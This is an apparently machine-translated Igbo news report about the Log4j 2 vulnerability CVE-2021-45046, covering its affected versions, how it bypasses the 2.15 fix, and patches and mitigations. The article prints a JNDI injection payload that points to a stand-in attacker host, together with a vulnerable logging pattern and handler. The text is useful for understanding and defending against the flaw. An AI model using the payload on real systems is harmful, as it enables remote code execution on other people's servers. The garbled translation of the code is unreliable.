Achọpụtala ihe ọghọm ọzọ na mmejuputa nyocha nke JNDI na ọbá akwụkwọ Log4j 2 (CVE-2021-45046), nke na-egosi n'agbanyeghị ndozi agbakwunyere na ntọhapụ 2.15 na n'agbanyeghị iji ntọala "log4j2.noFormatMsgLookup" maka nchebe. Nsogbu a dị ize ndụ karịsịa maka ụdị Log4j 2 ochie, echekwara ya site na iji ọkọlọtọ "noFormatMsgLookup", ebe ọ na-eme ka o kwe omume ịfefe nchebe site na adịghị ike gara aga (Log4Shell, CVE-2021-44228), nke na-enye gị ohere ịme koodu gị na ya. ihe nkesa. Maka ndị ọrụ ụdị 2.15, nrigbu bụ naanị ime ka ngwa ahụ daa n'ihi ike ọgwụgwụ nke akụrụngwa dị.
Ọdịmma ahụ na-apụta naanị na sistemụ na-eji Nchọgharị Ọdịnihu maka ndebanye aha, dị ka ${ctx:loginId}, ma ọ bụ ndebiri MDC (Map Context Thread), dị ka %X, %mdc, na %MDC. Arụ ọrụ na-agbadata n'ịmepụta ọnọdụ maka iwepụta data nwere nnọchi JNDI na log mgbe ị na-eji ajụjụ gbara ya gburugburu ma ọ bụ ndebiri MDC na ngwa na-akọwapụta iwu maka ịhazi mmepụta na log.
Ndị ọrụ nyocha si LunaSec kwuru na maka ụdị Log4j na-erughị 2.15, enwere ike iji adịghị ike a dị ka vector ọhụrụ maka ọgụ Log4Shell, na-eduga na mkpochapụ koodu, ma ọ bụrụ na ejiri okwu ThreadContext gụnyere data mpụga na mmepụta log, n'agbanyeghị ma ọ dị. Agbanyere ọkọlọtọ "chebe" noMsgFormatLookups" ma ọ bụ ndebiri "%m{nolookups}".
Ịfefe nchebe na-agbadata n'eziokwu na kama dochie anya "${jndi:ldap://attacker.com/a}", a na-anọchi anya okwu a site na uru nke mgbanwe etiti ejiri na iwu maka ịmepụta mmepụta log. . Dịka ọmụmaatụ, ọ bụrụ na a na-eji ajụjụ gbara ya gburugburu ${ctx:apiversion} mgbe ị na-ebupụta na log, mgbe ahụ enwere ike ịme mwakpo ahụ site n'ịgbanwe data "${jndi:ldap://attacker.com/a}" n'ime ya. uru edere na mgbanwe apiversion. Ọmụmaatụ nke koodu adịghị ike: appender.console.layout.pattern = ${ctx:apiversion} - %d{yyyy-MM-dd HH:mm:ss} %-5p %c{1}:%L - %m%n @ GetMapping("/") index eriri ọha (@RequestHeader("X-Api-Version") eriri apiVersion) {// A na-agafe uru isi HTTP "X-Api-Version" na ThreadContext ThreadContext.put("apiversion" ", apiVersion ); // Mgbe ị na-ebupụta na ndekọ ahụ, a ga-ahazi uru mpụta nke mpụga site na iji nnọchi ${ctx:apiversion} logger.info("Natara arịrịọ maka ụdị API"); laghachi "Ndewo, ụwa!"; }
Na ụdị Log4j 2.15, enwere ike iji adịghị ike ahụ mee ọgụ DoS mgbe ị na-agafe ụkpụrụ na ThreadContext, na-ebute akaghị aka na nhazi nhazi nhazi.
Iji gbochie adịghị ike ahụ, ebipụtara mmelite 2.16 na 2.12.2. Na ngalaba Log4j 2.16, na mgbakwunye na ndozi etinyere na ụdị 2.15 na njide nke arịrịọ JNDI LDAP maka “localhost”, arụ ọrụ JNDI nwere nkwarụ kpamkpam na ndabara na-ewepụ nkwado maka ndebiri nnọchi ozi. Dịka nchekwa nchekwa, a na-atụ aro ka iwepu klas JndiLookup na klaasị (dịka ọmụmaatụ, "zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class") .
Ị nwere ike ịchọpụta ọdịdị nke ndozi na ngwugwu na ibe nkesa (Debian, Ubuntu, RHEL, SUSE, Fedora, Arch) na ndị nrụpụta ikpo okwu Java (GitHub, Docker, Oracle, vmWare, Broadcom na Amazon/AWS, Juniper, VMware, Cisco, IBM, Red Hat, MongoDB, Okta, SolarWinds, Symantec, McAfee, SonicWall, FortiGuard, Ubiquiti, F-Secure, wdg).
isi: opennet.ru
